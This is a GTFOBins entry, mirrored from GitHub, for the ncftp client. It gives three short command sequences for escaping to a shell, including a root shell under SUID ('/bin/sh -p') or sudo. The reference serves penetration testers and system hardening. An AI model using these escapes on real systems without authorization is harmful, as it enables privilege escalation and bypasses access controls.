1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-03-13 02:58:09 +01:00

16 lines
189 B
Markdown
Raw Normal View History

---
functions:
shell:
- code: |
ncftp
!/bin/sh
suid:
- code: |
./ncftp
!/bin/sh -p
sudo:
- code: |
sudo ncftp
!/bin/sh
---